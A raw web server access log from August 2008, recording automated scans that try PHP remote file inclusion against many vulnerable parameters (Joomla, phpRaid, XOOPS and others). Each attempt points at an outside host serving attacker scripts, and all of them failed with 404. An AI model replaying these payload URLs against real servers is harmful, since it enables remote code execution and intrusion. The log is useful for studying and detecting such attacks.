65.254.49.34 - - [15/Aug/2008:20:59:33 -0700] "GET /logs/errors.php?error=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
65.254.49.34 - - [15/Aug/2008:20:59:33 -0700] "GET /errors.php?error=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
74.6.18.245 - - [15/Aug/2008:21:00:09 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "getyourselfahorse.com"
201.12.151.24 - - [15/Aug/2008:21:00:10 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.getyourselfahorse.com"
201.12.151.24 - - [15/Aug/2008:21:00:10 -0700] "GET /logs/access_080802.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.getyourselfahorse.com"
189.19.47.160 - - [15/Aug/2008:21:01:03 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "getyourselfahorse.com"
189.19.47.160 - - [15/Aug/2008:21:01:03 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "getyourselfahorse.com"
189.19.47.160 - - [15/Aug/2008:21:01:04 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
189.19.47.160 - - [15/Aug/2008:21:01:07 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "getyourselfahorse.com"
189.19.47.160 - - [15/Aug/2008:21:01:08 -0700] "GET /logs/access_080726.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
189.19.47.160 - - [15/Aug/2008:21:01:08 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
200.150.189.10 - - [15/Aug/2008:21:01:20 -0700] "GET /logs/access_080802.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.getyourselfahorse.com"
200.150.189.10 - - [15/Aug/2008:21:01:20 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.getyourselfahorse.com"
200.150.189.10 - - [15/Aug/2008:21:01:20 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.getyourselfahorse.com"
211.202.2.32 - - [15/Aug/2008:21:03:02 -0700] "GET //myevent.php?myevent_path=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
189.70.11.137 - - [15/Aug/2008:21:05:34 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "getyourselfahorse.com"
189.70.11.137 - - [15/Aug/2008:21:05:35 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "getyourselfahorse.com"
189.70.11.137 - - [15/Aug/2008:21:05:35 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "getyourselfahorse.com"
189.70.11.137 - - [15/Aug/2008:21:05:37 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
189.70.11.137 - - [15/Aug/2008:21:05:37 -0700] "GET /logs/access_080726.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
189.70.11.137 - - [15/Aug/2008:21:05:37 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
74.6.8.125 - - [15/Aug/2008:21:06:10 -0700] "GET /discuss/ HTTP/1.0" 200 512 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
211.202.2.32 - - [15/Aug/2008:21:07:17 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "getyourselfahorse.com"
200.251.162.130 - - [15/Aug/2008:21:09:24 -0700] "GET /logs/access_080726.log//announcements.php?phpraid_dir=http://paijoe.007gb.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
200.251.162.130 - - [15/Aug/2008:21:09:24 -0700] "GET /logs/access_080726.log//announcements.php?phpraid_dir=http://paijoe.007gb.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
200.251.162.130 - - [15/Aug/2008:21:09:24 -0700] "GET //announcements.php?phpraid_dir=http://paijoe.007gb.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
200.251.162.130 - - [15/Aug/2008:21:09:24 -0700] "GET //announcements.php?phpraid_dir=http://paijoe.007gb.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
200.251.162.130 - - [15/Aug/2008:21:09:25 -0700] "GET /logs//announcements.php?phpraid_dir=http://paijoe.007gb.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
200.251.162.130 - - [15/Aug/2008:21:09:25 -0700] "GET /logs//announcements.php?phpraid_dir=http://paijoe.007gb.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
74.6.8.125 - - [15/Aug/2008:21:11:43 -0700] "GET /logs/scripts.log HTTP/1.0" 200 812711 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
74.6.18.245 - - [15/Aug/2008:21:11:45 -0700] "GET /logs/access_080802.log HTTP/1.0" 200 131072 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "getyourselfahorse.com"
200.251.162.130 - - [15/Aug/2008:21:12:53 -0700] "GET /logs/access_080726.log//announcements.php?phpraid_dir=http://paijoe.007gb.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
200.251.162.130 - - [15/Aug/2008:21:12:54 -0700] "GET //announcements.php?phpraid_dir=http://paijoe.007gb.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
200.251.162.130 - - [15/Aug/2008:21:12:54 -0700] "GET /logs//announcements.php?phpraid_dir=http://paijoe.007gb.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
200.150.189.10 - - [15/Aug/2008:21:13:41 -0700] "GET /logs/access_080726.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.getyourselfahorse.com"
200.150.189.10 - - [15/Aug/2008:21:13:41 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.getyourselfahorse.com"
200.150.189.10 - - [15/Aug/2008:21:13:41 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.getyourselfahorse.com"
201.12.151.24 - - [15/Aug/2008:21:14:31 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.getyourselfahorse.com"
201.12.151.24 - - [15/Aug/2008:21:14:31 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.getyourselfahorse.com"
201.12.151.24 - - [15/Aug/2008:21:14:31 -0700] "GET /logs/access_080726.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.getyourselfahorse.com"
200.251.162.130 - - [15/Aug/2008:21:14:44 -0700] "GET /logs/access_080726.log//announcements.php?phpraid_dir=http://paijoe.007gb.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
200.251.162.130 - - [15/Aug/2008:21:14:44 -0700] "GET //announcements.php?phpraid_dir=http://paijoe.007gb.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
200.251.162.130 - - [15/Aug/2008:21:14:45 -0700] "GET /logs//announcements.php?phpraid_dir=http://paijoe.007gb.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
65.254.49.34 - - [15/Aug/2008:21:18:36 -0700] "GET /logs//login.php?_SESSION%5Bdocroot_path%5D=http://matrix-computers.net//language/Za/bot.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.getyourselfahorse.com"
65.254.49.34 - - [15/Aug/2008:21:18:36 -0700] "GET //login.php?_SESSION%5Bdocroot_path%5D=http://matrix-computers.net//language/Za/bot.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.getyourselfahorse.com"
200.251.162.130 - - [15/Aug/2008:21:20:01 -0700] "GET /logs/access.log//announcements.php?phpraid_dir=http://paijoe.007gb.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "getyourselfahorse.com"
200.251.162.130 - - [15/Aug/2008:21:20:01 -0700] "GET //announcements.php?phpraid_dir=http://paijoe.007gb.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "getyourselfahorse.com"
200.251.162.130 - - [15/Aug/2008:21:20:02 -0700] "GET /logs//announcements.php?phpraid_dir=http://paijoe.007gb.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "getyourselfahorse.com"
189.19.47.160 - - [15/Aug/2008:21:20:53 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
189.19.47.160 - - [15/Aug/2008:21:20:58 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
189.19.47.160 - - [15/Aug/2008:21:20:58 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
211.202.2.32 - - [15/Aug/2008:21:21:37 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
74.53.70.114 - - [15/Aug/2008:21:22:48 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_rss&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sonicsr.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.getyourselfahorse.com"
74.53.70.114 - - [15/Aug/2008:21:22:49 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_rss&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sonicsr.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.getyourselfahorse.com"
84.246.192.60 - - [15/Aug/2008:21:23:08 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kol-kidz.com/gallery/g2data/albums/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "getyourselfahorse.com"
84.246.192.60 - - [15/Aug/2008:21:23:08 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kol-kidz.com/gallery/g2data/albums/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "getyourselfahorse.com"
84.246.192.60 - - [15/Aug/2008:21:23:08 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kol-kidz.com/gallery/g2data/albums/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "getyourselfahorse.com"
69.61.106.55 - - [15/Aug/2008:21:24:22 -0700] "GET /logs/access_080719.log//login.php?_SESSION%5Bdocroot_path%5D=http://fdp.de/vorschaltseite/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.getyourselfahorse.com"
69.61.106.55 - - [15/Aug/2008:21:24:22 -0700] "GET //login.php?_SESSION%5Bdocroot_path%5D=http://fdp.de/vorschaltseite/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.getyourselfahorse.com"
69.61.106.55 - - [15/Aug/2008:21:24:22 -0700] "GET /logs//login.php?_SESSION%5Bdocroot_path%5D=http://fdp.de/vorschaltseite/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.getyourselfahorse.com"
74.6.18.245 - - [15/Aug/2008:21:24:43 -0700] "GET /discuss/ HTTP/1.0" 200 512 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "getyourselfahorse.com"
200.251.162.130 - - [15/Aug/2008:21:24:44 -0700] "GET /logs/access.log//announcements.php?phpraid_dir=http://paijoe.007gb.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "getyourselfahorse.com"
200.251.162.130 - - [15/Aug/2008:21:24:45 -0700] "GET //announcements.php?phpraid_dir=http://paijoe.007gb.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "getyourselfahorse.com"
200.251.162.130 - - [15/Aug/2008:21:24:45 -0700] "GET /logs//announcements.php?phpraid_dir=http://paijoe.007gb.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "getyourselfahorse.com"
67.19.173.36 - - [15/Aug/2008:21:24:48 -0700] "GET /logs/access_080719.log//login.php?_SESSION%5Bdocroot_path%5D=http://fdp.de/vorschaltseite/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.getyourselfahorse.com"
67.19.173.36 - - [15/Aug/2008:21:24:48 -0700] "GET //login.php?_SESSION%5Bdocroot_path%5D=http://fdp.de/vorschaltseite/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.getyourselfahorse.com"
67.19.173.36 - - [15/Aug/2008:21:24:49 -0700] "GET /logs//login.php?_SESSION%5Bdocroot_path%5D=http://fdp.de/vorschaltseite/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.getyourselfahorse.com"
189.19.47.160 - - [15/Aug/2008:21:25:10 -0700] "GET /logs/access_080719.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
69.61.106.55 - - [15/Aug/2008:21:26:06 -0700] "GET //login.php?_SESSION%5Bdocroot_path%5D=http://fdp.de/vorschaltseite/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.getyourselfahorse.com"
84.246.192.60 - - [15/Aug/2008:21:26:40 -0700] "GET /logs/access_080802.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kol-kidz.com/gallery/g2data/albums/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
84.246.192.60 - - [15/Aug/2008:21:26:40 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kol-kidz.com/gallery/g2data/albums/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
84.246.192.60 - - [15/Aug/2008:21:26:40 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kol-kidz.com/gallery/g2data/albums/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
84.246.192.60 - - [15/Aug/2008:21:28:06 -0700] "GET /logs/access_080719.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kol-kidz.com/gallery/g2data/albums/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
74.53.70.114 - - [15/Aug/2008:21:28:48 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_rss&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sonicsr.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "getyourselfahorse.com"
74.53.70.114 - - [15/Aug/2008:21:28:48 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_rss&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sonicsr.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "getyourselfahorse.com"
141.44.140.111 - - [15/Aug/2008:21:34:04 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
141.44.140.111 - - [15/Aug/2008:21:34:07 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "getyourselfahorse.com"
209.160.73.116 - - [15/Aug/2008:21:34:23 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.getyourselfahorse.com"
209.160.73.116 - - [15/Aug/2008:21:34:23 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.getyourselfahorse.com"
209.160.73.116 - - [15/Aug/2008:21:34:28 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.getyourselfahorse.com"
209.160.73.116 - - [15/Aug/2008:21:34:28 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.getyourselfahorse.com"
193.178.228.12 - - [15/Aug/2008:21:35:24 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.getyourselfahorse.com"
193.178.228.12 - - [15/Aug/2008:21:35:24 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.getyourselfahorse.com"
204.15.10.22 - - [15/Aug/2008:21:35:37 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.getyourselfahorse.com"
204.15.10.22 - - [15/Aug/2008:21:35:37 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.getyourselfahorse.com"
62.169.0.50 - - [15/Aug/2008:21:40:33 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.getyourselfahorse.com"
62.169.0.50 - - [15/Aug/2008:21:40:33 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.getyourselfahorse.com"
204.15.10.22 - - [15/Aug/2008:21:47:01 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
204.15.10.22 - - [15/Aug/2008:21:47:01 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
204.15.10.22 - - [15/Aug/2008:21:47:01 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
209.160.73.116 - - [15/Aug/2008:21:47:05 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
209.160.73.116 - - [15/Aug/2008:21:47:05 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
209.160.73.116 - - [15/Aug/2008:21:47:05 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
209.160.73.116 - - [15/Aug/2008:21:47:05 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
209.160.73.116 - - [15/Aug/2008:21:47:05 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
209.160.73.116 - - [15/Aug/2008:21:47:05 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
212.150.247.23 - - [15/Aug/2008:21:47:26 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.getyourselfahorse.com"
212.150.247.23 - - [15/Aug/2008:21:47:27 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.getyourselfahorse.com"
84.244.191.41 - - [15/Aug/2008:21:47:40 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
84.244.191.41 - - [15/Aug/2008:21:47:41 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
62.169.0.50 - - [15/Aug/2008:21:47:52 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
62.169.0.50 - - [15/Aug/2008:21:47:53 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
62.169.0.50 - - [15/Aug/2008:21:47:57 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
62.169.0.50 - - [15/Aug/2008:21:47:58 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
84.244.191.41 - - [15/Aug/2008:21:48:00 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
